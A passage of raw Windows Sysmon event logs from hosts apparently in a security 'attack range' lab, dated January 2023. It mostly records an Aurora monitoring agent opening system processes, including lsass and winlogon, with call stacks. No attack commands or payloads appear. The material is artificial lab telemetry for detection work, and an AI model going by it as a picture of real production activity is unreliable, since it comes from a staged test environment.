Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=566CB0F462AAFD41690788D3425B9D72,SHA256=ACC1AC816C6E2B1430DC0B40D03195D598339A03C029760FD8715B1829B2AA4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045129Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:02.213{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64712E31A67044DF6228618AAF108AB9,SHA256=32C9354E4470C66384FB04C3E23B68356319ACA70F70018029DD8E378AADF28D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000017604Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:02.839{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCCE-63C7-EB00-00000000B002}3756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017603Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:02.836{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017602Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:02.835{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-A300-00000000B002}968C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017601Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:02.831{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017600Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:02.825{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCBE-63C7-9400-00000000B002}4004C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017599Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:02.824{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5300-00000000B002}3348C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017598Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:02.822{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5200-00000000B002}3336C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017597Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:02.818{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017596Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:02.818{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3900-00000000B002}1148C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017595Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:02.812{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017594Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:02.810{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC45-63C7-2200-00000000B002}2524C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017593Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:02.798{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017592Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:02.793{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1E00-00000000B002}1200C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017591Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:02.788{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1D00-00000000B002}1080C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017590Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:02.776{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1B00-00000000B002}1944C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017589Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:02.773{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1900-00000000B002}1888C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017588Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:02.762{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1800-00000000B002}1804C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017587Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:02.754{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1700-00000000B002}1260C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017586Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:02.725{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017585Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:02.709{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017584Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:02.692{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017583Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:02.677{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1300-00000000B002}440C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017582Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:02.662{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017581Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:02.624{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017580Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:02.614{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1000-00000000B002}944C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017579Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:02.604{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0F00-00000000B002}908C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017578Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:02.594{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0E00-00000000B002}900C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017577Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:02.585{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0D00-00000000B002}780C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017576Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:02.574{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0C00-00000000B002}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017575Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:02.555{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017574Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:02.546{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0900-00000000B002}572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 